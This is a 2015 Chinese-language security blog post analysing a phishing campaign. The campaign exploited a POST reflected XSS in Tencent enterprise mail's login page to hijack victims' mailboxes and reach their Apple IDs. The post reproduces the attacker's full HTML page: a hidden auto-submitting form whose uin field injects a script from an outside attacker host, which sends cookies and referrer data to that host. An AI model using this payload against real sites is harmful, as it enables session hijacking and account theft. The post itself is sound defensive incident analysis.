IT博客汇
  • 首页
  • 精华
  • 技术
  • 设计
  • 资讯
  • 扯淡
  • 权利声明
  • 登录 注册

    腾讯企业邮箱跨站漏洞分析

    niubl发表于 2015-11-03 02:31:59
    love 0

    Author: Evi1m0#KnownSec

     

    中午朋友发来一个帖子询问我《朋友 6S 被偷了,小偷(可能是团伙)发来链接偷取 APPLE ID》是什么原理,之后和 RickGay 看了下是利用腾讯企业邮箱的 POST XSS 进行的盗取登录操作,从而登录受害者邮箱获取 APPLE ID。(目前腾讯已经修复此漏洞)

     

    Target: http://eeee.washbowl.com.cn/

    View-Source:

    c334041bgw1exmoyt2y2jj20hw07pgmj

    源码写入两个 iframe ,恶意代码在 /htmlpage5.html 中:

    <html>
    <head>
        <meta charset="utf-8" />
        <title>qqjs4</title>
    </head>
    <body>
        <script>
            function test(PARAMS) {
                var temp = document.createElement("form");
                temp.acceptCharset = "utf-8";
                //By Wfox
                temp.action = 'http://m.exmail.qq.com/cgi-bin/login';
                temp.method = "post";
                temp.style.display = "none";
                for (var x in PARAMS) {
                    var opt = document.createElement("textarea");
                    opt.name = x;
                    opt.value = PARAMS[x];
                    temp.appendChild(opt);
                }
                document.body.appendChild(temp);
                temp.submit();
            }
            test({
                uin: '\\&quot;&lt;/script&gt;&lt;script src=http://ryige.com/q/8&gt;&lt;/script&gt;',
            });
        </script>
    </body>
    </html>

    脚本创建 action 目标为腾讯企业邮箱的登录地址 form 表单,调用 test() 函数传入 uin 的参数值为 XSS Payload。

    // 这个 POST 反射型 XSS 是由于企业邮箱登录报错未做过滤处理导致:

    c334041bgw1exmp6f5hf5j20ug0bo76s

    参数 uin ,攻击者注入 http://ryige.com/q/8 脚本:

    c334041bgw1exmp3dzgknj20w40a4wgh

    Payload 将获取企业邮箱的 document.cookie & document.referrer 并发送给攻击者。

    注:因腾讯企业邮箱不仅仅需要 Cookie 还需要登录成功后 URL sid 等信息;



沪ICP备19023445号-2号
友情链接